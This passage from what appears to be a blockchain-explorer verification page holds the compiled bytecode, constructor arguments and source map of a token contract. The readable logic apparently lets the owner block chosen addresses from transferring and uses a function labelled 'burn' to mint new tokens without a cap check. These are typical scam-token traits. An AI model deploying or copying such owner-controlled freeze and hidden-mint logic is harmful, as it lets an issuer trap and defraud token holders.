b6000602082019050818103600083015261171d8161159a565b9050919050565b6000602082019050818103600083015261173d816115bd565b9050919050565b6000602082019050818103600083015261175d816115e0565b9050919050565b6000602082019050818103600083015261177d81611603565b9050919050565b6000602082019050818103600083015261179d81611626565b9050919050565b60006020820190506117b96000830184611649565b92915050565b60006020820190506117d46000830184611658565b92915050565b600081519050919050565b600082825260208201905092915050565b60006118018261188a565b915061180c8361188a565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561184157611840611906565b5b828201905092915050565b60006118578261186a565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b838110156118bf5780820151818401526020810190506118a4565b838111156118ce576000848401525b50505050565b600060028204905060018216806118ec57607f821691505b60208210811415611900576118ff611935565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b50565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b611b5e8161184c565b8114611b6957600080fd5b50565b611b758161188a565b8114611b8057600080fd5b5056fea2646970667358221220113081774b9fb9ac2055c4da101c9823ef45afacd01d4067b9c39ec163afd03c64736f6c63430008010033000000000000000000000000430f41942a6c04855469b8850d1860821b694d8600000000000000000000000000000000000000000000003635c9adc5dea0000000000000000000000000000000000000000000000000003635c9adc5dea00000
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a9059cbb11610071578063a9059cbb146102ba578063c0d611e5146102ea578063dd62ed3e14610308578063f2fde38b14610338578063fef63a92146103545761010b565b8063715018a61461024657806395d89b41146102505780639dc29fac1461026e578063a457c2d71461028a5761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca5780633960d944146101fa57806370a08231146102165761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611682565b60405180910390f35b610148600480360381019061014391906114ad565b610416565b6040516101559190611667565b60405180910390f35b610166610434565b60405161017391906117a4565b60405180910390f35b6101966004803603810190610191919061145e565b61043e565b6040516101a39190611667565b60405180910390f35b6101b4610536565b6040516101c191906117bf565b60405180910390f35b6101e460048036038101906101df91906114ad565b61054d565b6040516101f19190611667565b60405180910390f35b610214600480360381019061020f91906113f9565b6105f9565b005b610230600480360381019061022b91906113f9565b610787565b60405161023d91906117a4565b60405180910390f35b61024e6107d0565b005b610258610858565b6040516102659190611682565b60405180910390f35b610288600480360381019061028391906114ad565b6108ea565b005b6102a4600480360381019061029f91906114ad565b6108f8565b6040516102b19190611667565b60405180910390f35b6102d460048036038101906102cf91906114ad565b6109e3565b6040516102e19190611667565b60405180910390f35b6102f2610a01565b6040516102ff91906117a4565b60405180910390f35b610322600480360381019061031d9190611422565b610a29565b60405161032f91906117a4565b60405180910390f35b610352600480360381019061034d91906113f9565b610ab0565b005b61036e600480360381019061036991906113f9565b610ba8565b60405161037b9190611667565b60405180910390f35b606060058054610393906118d4565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906118d4565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b600061042a610423610bfe565b8484610c06565b6001905092915050565b6000600454905090565b600061044b848484610dd1565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610496610bfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610516576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161050d906116e4565b60405180910390fd5b61052a85610522610bfe565b858403610c06565b60019150509392505050565b6000600760009054906101000a900460ff16905090565b60006105ef61055a610bfe565b848460036000610568610bfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546105ea91906117f6565b610c06565b6001905092915050565b610601610bfe565b73ffffffffffffffffffffffffffffffffffffffff1661061f6110fb565b73ffffffffffffffffffffffffffffffffffffffff1614610675576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161066c90611704565b60405180910390fd5b60001515600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161515141561072b576001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610784565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107d8610bfe565b73ffffffffffffffffffffffffffffffffffffffff166107f66110fb565b73ffffffffffffffffffffffffffffffffffffffff161461084c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084390611704565b60405180910390fd5b6108566000611124565b565b606060068054610867906118d4565b80601f0160208091040260200160405190810160405280929190818152602001828054610893906118d4565b80156108e05780601f106108b5576101008083540402835291602001916108e0565b820191906000526020600020905b8154815290600101906020018083116108c357829003601f168201915b5050505050905090565b6108f482826111e8565b5050565b60008060036000610907610bfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156109c4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109bb90611764565b60405180910390fd5b6109d86109cf610bfe565b85858403610c06565b600191505092915050565b60006109f76109f0610bfe565b8484610dd1565b6001905092915050565b60007f00000000000000000000000000000000000000000000003635c9adc5dea00000905090565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610ab8610bfe565b73ffffffffffffffffffffffffffffffffffffffff16610ad66110fb565b73ffffffffffffffffffffffffffffffffffffffff1614610b2c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2390611704565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610b9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b93906116a4565b60405180910390fd5b610ba581611124565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6d90611744565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ce6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdd906116c4565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610dc491906117a4565b60405180910390a3505050565b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610e725750600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610ee757600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614610ee6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610edd90611724565b60405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f57576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f4e90611724565b60405180910390fd5b610f628383836113c5565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610fe9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe090611724565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461107e91906117f6565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516110e291906117a4565b60405180910390a36110f58484846113ca565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6111f0610bfe565b73ffffffffffffffffffffffffffffffffffffffff1661120e6110fb565b73ffffffffffffffffffffffffffffffffffffffff1614611264576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161125b90611704565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156112d4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112cb90611784565b60405180910390fd5b6112e0600083836113c5565b80600460008282546112f291906117f6565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461134891906117f6565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516113ad91906117a4565b60405180910390a36113c1600083836113ca565b5050565b505050565b505050565b6000813590506113de81611b55565b92915050565b6000813590506113f381611b6c565b92915050565b60006020828403121561140b57600080fd5b6000611419848285016113cf565b91505092915050565b6000806040838503121561143557600080fd5b6000611443858286016113cf565b9250506020611454858286016113cf565b9150509250929050565b60008060006060848603121561147357600080fd5b6000611481868287016113cf565b9350506020611492868287016113cf565b92505060406114a3868287016113e4565b9150509250925092565b600080604083850312156114c057600080fd5b60006114ce858286016113cf565b92505060206114df858286016113e4565b9150509250929050565b6114f28161185e565b82525050565b6000611503826117da565b61150d81856117e5565b935061151d8185602086016118a1565b61152681611964565b840191505092915050565b600061153e6026836117e5565b915061154982611975565b604082019050919050565b60006115616022836117e5565b915061156c826119c4565b604082019050919050565b60006115846028836117e5565b915061158f82611a13565b604082019050919050565b60006115a76020836117e5565b91506115b282611a62565b602082019050919050565b60006115ca6000836117e5565b91506115d582611a8b565b600082019050919050565b60006115ed6024836117e5565b91506115f882611a8e565b604082019050919050565b60006116106025836117e5565b915061161b82611add565b604082019050919050565b6000611633601f836117e5565b915061163e82611b2c565b602082019050919050565b6116528161188a565b82525050565b61166181611894565b82525050565b600060208201905061167c60008301846114e9565b92915050565b6000602082019050818103600083015261169c81846114f8565b905092915050565b600060208201905081810360008301526116bd81611531565b9050919050565b600060208201905081810360008301526116dd81611554565b9050919050565b600060208201905081810360008301526116fd81611577565b9050919050565b6000602082019050818103600083015261171d8161159a565b9050919050565b6000602082019050818103600083015261173d816115bd565b9050919050565b6000602082019050818103600083015261175d816115e0565b9050919050565b6000602082019050818103600083015261177d81611603565b9050919050565b6000602082019050818103600083015261179d81611626565b9050919050565b60006020820190506117b96000830184611649565b92915050565b60006020820190506117d46000830184611658565b92915050565b600081519050919050565b600082825260208201905092915050565b60006118018261188a565b915061180c8361188a565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561184157611840611906565b5b828201905092915050565b60006118578261186a565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b838110156118bf5780820151818401526020810190506118a4565b838111156118ce576000848401525b50505050565b600060028204905060018216806118ec57607f821691505b60208210811415611900576118ff611935565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b50565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b611b5e8161184c565b8114611b6957600080fd5b50565b611b758161188a565b8114611b8057600080fd5b5056fea2646970667358221220113081774b9fb9ac2055c4da101c9823ef45afacd01d4067b9c39ec163afd03c64736f6c63430008010033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000430f41942a6c04855469b8850d1860821b694d8600000000000000000000000000000000000000000000003635c9adc5dea0000000000000000000000000000000000000000000000000003635c9adc5dea00000
-----Decoded View---------------
Arg [0] : _premintOwner (address): 0x430f41942a6C04855469b8850D1860821b694d86
Arg [1] : _premintSupply (uint256): 1000000000000000000000
Arg [2] : _capLimit (uint256): 1000000000000000000000
-----Encoded View---------------
3 Constructor Arguments found :
Arg [0] : 000000000000000000000000430f41942a6c04855469b8850d1860821b694d86
Arg [1] : 00000000000000000000000000000000000000000000003635c9adc5dea00000
Arg [2] : 00000000000000000000000000000000000000000000003635c9adc5dea00000
Deployed Bytecode Sourcemap
18317:1135:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7715:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9889:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8842:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10540:490;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8677:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12154:215;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11315:205;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9013:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2389:103;;;:::i;:::-;;7934:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19352:97;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12872:411;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9353:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19143:95;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9591:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2647:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11627:118;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7715:100;7769:13;7802:5;7795:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7715:100;:::o;9889:169::-;9972:4;9989:39;9998:12;:10;:12::i;:::-;10012:7;10021:6;9989:8;:39::i;:::-;10046:4;10039:11;;9889:169;;;;:::o;8842:108::-;8903:7;8930:12;;8923:19;;8842:108;:::o;10540:490::-;10680:4;10697:36;10707:6;10715:9;10726:6;10697:9;:36::i;:::-;10746:24;10773:11;:19;10785:6;10773:19;;;;;;;;;;;;;;;:33;10793:12;:10;:12::i;:::-;10773:33;;;;;;;;;;;;;;;;10746:60;;10845:6;10825:16;:26;;10817:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;10932:57;10941:6;10949:12;:10;:12::i;:::-;10982:6;10963:16;:25;10932:8;:57::i;:::-;11018:4;11011:11;;;10540:490;;;;;:::o;8677:100::-;8735:5;8760:9;;;;;;;;;;;8753:16;;8677:100;:::o;12154:215::-;12242:4;12259:80;12268:12;:10;:12::i;:::-;12282:7;12328:10;12291:11;:25;12303:12;:10;:12::i;:::-;12291:25;;;;;;;;;;;;;;;:34;12317:7;12291:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;12259:8;:80::i;:::-;12357:4;12350:11;;12154:215;;;;:::o;11315:205::-;1969:12;:10;:12::i;:::-;1958:23;;:7;:5;:7::i;:::-;:23;;;1950:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11419:5:::1;11390:34;;:17;:25;11408:6;11390:25;;;;;;;;;;;;;;;;;;;;;;;;;:34;;;11377:136;;;11455:4;11427:17;:25;11445:6;11427:25;;;;;;;;;;;;;;;;:32;;;;;;;;;;;;;;;;;;11377:136;;;11506:5;11478:17;:25;11496:6;11478:25;;;;;;;;;;;;;;;;:33;;;;;;;;;;;;;;;;;;11377:136;11315:205:::0;:::o;9013:127::-;9087:7;9114:9;:18;9124:7;9114:18;;;;;;;;;;;;;;;;9107:25;;9013:127;;;:::o;2389:103::-;1969:12;:10;:12::i;:::-;1958:23;;:7;:5;:7::i;:::-;:23;;;1950:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2454:30:::1;2481:1;2454:18;:30::i;:::-;2389:103::o:0;7934:104::-;7990:13;8023:7;8016:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7934:104;:::o;19352:97::-;19419:22;19425:7;19434:6;19419:5;:22::i;:::-;19352:97;;:::o;12872:411::-;12965:4;12982:24;13009:11;:25;13021:12;:10;:12::i;:::-;13009:25;;;;;;;;;;;;;;;:34;13035:7;13009:34;;;;;;;;;;;;;;;;12982:61;;13082:15;13062:16;:35;;13054:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;13175:67;13184:12;:10;:12::i;:::-;13198:7;13226:15;13207:16;:34;13175:8;:67::i;:::-;13271:4;13264:11;;;12872:411;;;;:::o;9353:175::-;9439:4;9456:42;9466:12;:10;:12::i;:::-;9480:9;9491:6;9456:9;:42::i;:::-;9516:4;9509:11;;9353:175;;;;:::o;19143:95::-;19192:7;19219:11;19212:18;;19143:95;:::o;9591:151::-;9680:7;9707:11;:18;9719:5;9707:18;;;;;;;;;;;;;;;:27;9726:7;9707:27;;;;;;;;;;;;;;;;9700:34;;9591:151;;;;:::o;2647:201::-;1969:12;:10;:12::i;:::-;1958:23;;:7;:5;:7::i;:::-;:23;;;1950:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2756:1:::1;2736:22;;:8;:22;;;;2728:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;2812:28;2831:8;2812:18;:28::i;:::-;2647:201:::0;:::o;11627:118::-;11688:4;11712:17;:25;11730:6;11712:25;;;;;;;;;;;;;;;;;;;;;;;;;11705:32;;11627:118;;;:::o;603:98::-;656:7;683:10;676:17;;603:98;:::o;16285:344::-;16404:1;16387:19;;:5;:19;;;;16379:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16485:1;16466:21;;:7;:21;;;;16458:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16567:6;16537:11;:18;16549:5;16537:18;;;;;;;;;;;;;;;:27;16556:7;16537:27;;;;;;;;;;;;;;;:36;;;;16605:7;16589:32;;16598:5;16589:32;;;16614:6;16589:32;;;;;;:::i;:::-;;;;;;;;16285:344;;;:::o;13773:703::-;13908:17;:25;13926:6;13908:25;;;;;;;;;;;;;;;;;;;;;;;;;:57;;;;13937:17;:28;13955:9;13937:28;;;;;;;;;;;;;;;;;;;;;;;;;13908:57;13895:114;;;14002:1;13984:20;;:6;:20;;;13976:33;;;;;;;;;;;;:::i;:::-;;;;;;;;;13895:114;14049:1;14028:23;;:9;:23;;;;14020:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;14078:47;14099:6;14107:9;14118:6;14078:20;:47::i;:::-;14138:21;14162:9;:17;14172:6;14162:17;;;;;;;;;;;;;;;;14138:41;;14215:6;14198:13;:23;;14190:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;14298:6;14282:13;:22;14262:9;:17;14272:6;14262:17;;;;;;;;;;;;;;;:42;;;;14350:6;14326:9;:20;14336:9;14326:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;14391:9;14374:35;;14383:6;14374:35;;;14402:6;14374:35;;;;;;:::i;:::-;;;;;;;;14422:46;14442:6;14450:9;14461:6;14422:19;:46::i;:::-;13773:703;;;;:::o;1736:89::-;1784:7;1811:6;;;;;;;;;;;1804:13;;1736:89;:::o;3008:191::-;3082:16;3101:6;;;;;;;;;;;3082:25;;3127:8;3118:6;;:17;;;;;;;;;;;;;;;;;;3182:8;3151:40;;3172:8;3151:40;;;;;;;;;;;;3008:191;;:::o;15434:409::-;1969:12;:10;:12::i;:::-;1958:23;;:7;:5;:7::i;:::-;:23;;;1950:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15547:1:::1;15528:21;;:7;:21;;;;15520:65;;;;;;;;;;;;:::i;:::-;;;;;;;;;15598:49;15627:1;15631:7;15640:6;15598:20;:49::i;:::-;15676:6;15660:12;;:22;;;;;;;:::i;:::-;;;;;;;;15715:6;15693:9;:18;15703:7;15693:18;;;;;;;;;;;;;;;;:28;;;;;;;:::i;:::-;;;;;;;;15758:7;15737:37;;15754:1;15737:37;;;15767:6;15737:37;;;;;;:::i;:::-;;;;;;;;15787:48;15815:1;15819:7;15828:6;15787:19;:48::i;:::-;15434:409:::0;;:::o;17229:125::-;;;;:::o;17958:124::-;;;;:::o;7:139:1:-;;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:139::-;;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;204:87;;;;:::o;297:262::-;;405:2;393:9;384:7;380:23;376:32;373:2;;;421:1;418;411:12;373:2;464:1;489:53;534:7;525:6;514:9;510:22;489:53;:::i;:::-;479:63;;435:117;363:196;;;;:::o;565:407::-;;;690:2;678:9;669:7;665:23;661:32;658:2;;;706:1;703;696:12;658:2;749:1;774:53;819:7;810:6;799:9;795:22;774:53;:::i;:::-;764:63;;720:117;876:2;902:53;947:7;938:6;927:9;923:22;902:53;:::i;:::-;892:63;;847:118;648:324;;;;;:::o;978:552::-;;;;1120:2;1108:9;1099:7;1095:23;1091:32;1088:2;;;1136:1;1133;1126:12;1088:2;1179:1;1204:53;1249:7;1240:6;1229:9;1225:22;1204:53;:::i;:::-;1194:63;;1150:117;1306:2;1332:53;1377:7;1368:6;1357:9;1353:22;1332:53;:::i;:::-;1322:63;;1277:118;1434:2;1460:53;1505:7;1496:6;1485:9;1481:22;1460:53;:::i;:::-;1450:63;;1405:118;1078:452;;;;;:::o;1536:407::-;;;1661:2;1649:9;1640:7;1636:23;1632:32;1629:2;;;1677:1;1674;1667:12;1629:2;1720:1;1745:53;1790:7;1781:6;1770:9;1766:22;1745:53;:::i;:::-;1735:63;;1691:117;1847:2;1873:53;1918:7;1909:6;1898:9;1894:22;1873:53;:::i;:::-;1863:63;;1818:118;1619:324;;;;;:::o;1949:109::-;2030:21;2045:5;2030:21;:::i;:::-;2025:3;2018:34;2008:50;;:::o;2064:364::-;;2180:39;2213:5;2180:39;:::i;:::-;2235:71;2299:6;2294:3;2235:71;:::i;:::-;2228:78;;2315:52;2360:6;2355:3;2348:4;2341:5;2337:16;2315:52;:::i;:::-;2392:29;2414:6;2392:29;:::i;:::-;2387:3;2383:39;2376:46;;2156:272;;;;;:::o;2434:366::-;;2597:67;2661:2;2656:3;2597:67;:::i;:::-;2590:74;;2673:93;2762:3;2673:93;:::i;:::-;2791:2;2786:3;2782:12;2775:19;;2580:220;;;:::o;2806:366::-;;2969:67;3033:2;3028:3;2969:67;:::i;:::-;2962:74;;3045:93;3134:3;3045:93;:::i;:::-;3163:2;3158:3;3154:12;3147:19;;2952:220;;;:::o;3178:366::-;;3341:67;3405:2;3400:3;3341:67;:::i;:::-;3334:74;;3417:93;3506:3;3417:93;:::i;:::-;3535:2;3530:3;3526:12;3519:19;;3324:220;;;:::o;3550:366::-;;3713:67;3777:2;3772:3;3713:67;:::i;:::-;3706:74;;3789:93;3878:3;3789:93;:::i;:::-;3907:2;3902:3;3898:12;3891:19;;3696:220;;;:::o;3922:364::-;;4085:66;4149:1;4144:3;4085:66;:::i;:::-;4078:73;;4160:93;4249:3;4160:93;:::i;:::-;4278:1;4273:3;4269:11;4262:18;;4068:218;;;:::o;4292:366::-;;4455:67;4519:2;4514:3;4455:67;:::i;:::-;4448:74;;4531:93;4620:3;4531:93;:::i;:::-;4649:2;4644:3;4640:12;4633:19;;4438:220;;;:::o;4664:366::-;;4827:67;4891:2;4886:3;4827:67;:::i;:::-;4820:74;;4903:93;4992:3;4903:93;:::i;:::-;5021:2;5016:3;5012:12;5005:19;;4810:220;;;:::o;5036:366::-;;5199:67;5263:2;5258:3;5199:67;:::i;:::-;5192:74;;5275:93;5364:3;5275:93;:::i;:::-;5393:2;5388:3;5384:12;5377:19;;5182:220;;;:::o;5408:118::-;5495:24;5513:5;5495:24;:::i;:::-;5490:3;5483:37;5473:53;;:::o;5532:112::-;5615:22;5631:5;5615:22;:::i;:::-;5610:3;5603:35;5593:51;;:::o;5650:210::-;;5775:2;5764:9;5760:18;5752:26;;5788:65;5850:1;5839:9;5835:17;5826:6;5788:65;:::i;:::-;5742:118;;;;:::o;5866:313::-;;6017:2;6006:9;6002:18;5994:26;;6066:9;6060:4;6056:20;6052:1;6041:9;6037:17;6030:47;6094:78;6167:4;6158:6;6094:78;:::i;:::-;6086:86;;5984:195;;;;:::o;6185:419::-;;6389:2;6378:9;6374:18;6366:26;;6438:9;6432:4;6428:20;6424:1;6413:9;6409:17;6402:47;6466:131;6592:4;6466:131;:::i;:::-;6458:139;;6356:248;;;:::o;6610:419::-;;6814:2;6803:9;6799:18;6791:26;;6863:9;6857:4;6853:20;6849:1;6838:9;6834:17;6827:47;6891:131;7017:4;6891:131;:::i;:::-;6883:139;;6781:248;;;:::o;7035:419::-;;7239:2;7228:9;7224:18;7216:26;;7288:9;7282:4;7278:20;7274:1;7263:9;7259:17;7252:47;7316:131;7442:4;7316:131;:::i;:::-;7308:139;;7206:248;;;:::o;7460:419::-;;7664:2;7653:9;7649:18;7641:26;;7713:9;7707:4;7703:20;7699:1;7688:9;7684:17;7677:47;7741:131;7867:4;7741:131;:::i;:::-;7733:139;;7631:248;;;:::o;7885:419::-;;8089:2;8078:9;8074:18;8066:26;;8138:9;8132:4;8128:20;8124:1;8113:9;8109:17;8102:47;8166:131;8292:4;8166:131;:::i;:::-;8158:139;;8056:248;;;:::o;8310:419::-;;8514:2;8503:9;8499:18;8491:26;;8563:9;8557:4;8553:20;8549:1;8538:9;8534:17;8527:47;8591:131;8717:4;8591:131;:::i;:::-;8583:139;;8481:248;;;:::o;8735:419::-;;8939:2;8928:9;8924:18;8916:26;;8988:9;8982:4;8978:20;8974:1;8963:9;8959:17;8952:47;9016:131;9142:4;9016:131;:::i;:::-;9008:139;;8906:248;;;:::o;9160:419::-;;9364:2;9353:9;9349:18;9341:26;;9413:9;9407:4;9403:20;9399:1;9388:9;9384:17;9377:47;9441:131;9567:4;9441:131;:::i;:::-;9433:139;;9331:248;;;:::o;9585:222::-;;97